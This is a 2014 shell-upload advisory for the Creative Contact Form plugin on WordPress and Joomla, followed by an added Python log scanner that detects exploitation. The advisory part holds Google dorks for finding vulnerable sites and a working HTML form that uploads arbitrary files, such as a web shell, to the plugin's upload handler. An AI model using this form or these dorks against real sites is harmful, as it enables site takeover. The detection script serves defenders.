#- Title: WordPress and Joomla Creative Contact Form Shell Upload Vulnerability
#- Author: Vulnerability discovered by Gianni Angelozzi
Exploit written by Claudio Viviani
#- Date: 2014-10-25
#- Developer : creative-solutions .net
#- Link Download : creative-solutions .net/joomla/creative-contact-form
creative-solutions .net/wordpress/creative-contact-form
#- Google Dork: inurl:"/sexy-contact-form/" (WordPress)
inurl:com_creativecontactform (Joomla)
#- Fixed in Version : WordPress > 0.9.7, Joomla > 2.0.0
#- Tested on : Backbox
===================================================
-- Proof Of Concept --
When Vuln : {"files":
CSRF :
<form method="POST" action="http://target. com/components/com_sexycontactform/fileupload/index.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
Shell Path : Here
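
For defenders, an added example (not part of the original advisory or the exploit author's code): a Python scan of web access logs for requests to the upload handler named in the form action above. The combined log format, the constructed sample lines, and the assumption that uploaded files are stored below the fileupload/ directory are assumptions of this example, not facts from the page.

```python
import re

# Component directory names that appear on this page (form action and dorks).
COMPONENTS = ("com_sexycontactform", "com_creativecontactform",
              "sexy-contact-form")

# Combined log format: client, identity, user, [time], "request line", status
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

def classify(line):
    """Return (ip, finding) for a suspicious request, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    path = m["path"].split("?", 1)[0].lower()
    if not any(c in path for c in COMPONENTS) or "/fileupload/" not in path:
        return None
    tail = path.split("/fileupload/", 1)[1]
    if m["method"] == "POST" and tail in ("", "index.php"):
        return m["ip"], "upload-attempt"
    # Assumption: uploads are stored below the handler's directory, so any
    # other script requested from there is a candidate dropped file.
    if tail != "index.php" and re.search(r"\.(php\d?|phtml|phar)$", tail):
        kind = "script-served" if m["status"] == "200" else "script-probe"
        return m["ip"], kind
    return None

def scan(lines):
    """Classify every line and keep only the findings, in log order."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample log lines (documentation IP ranges, made-up file names).
SAMPLE = [
    '198.51.100.7 - - [25/Oct/2014:10:00:01 +0000] "POST /components/com_sexycontactform/fileupload/index.php HTTP/1.1" 200 312',
    '198.51.100.7 - - [25/Oct/2014:10:00:05 +0000] "GET /components/com_sexycontactform/fileupload/files/x.php HTTP/1.1" 200 17',
    '203.0.113.9 - - [25/Oct/2014:10:02:11 +0000] "GET /wp-content/plugins/sexy-contact-form/includes/fileupload/files/x.php HTTP/1.1" 404 210',
    '192.0.2.44 - - [25/Oct/2014:10:03:00 +0000] "GET /index.php?option=com_content HTTP/1.1" 200 9001',
    '192.0.2.44 - - [25/Oct/2014:10:03:02 +0000] "GET /components/com_sexycontactform/fileupload/index.php HTTP/1.1" 200 40',
]

if __name__ == "__main__":
    for ip, finding in scan(SAMPLE):
        print(ip, finding)
```

On a host still running a version older than the fixed releases listed above, an upload-attempt followed by script-served from the same client is the sequence to triage first.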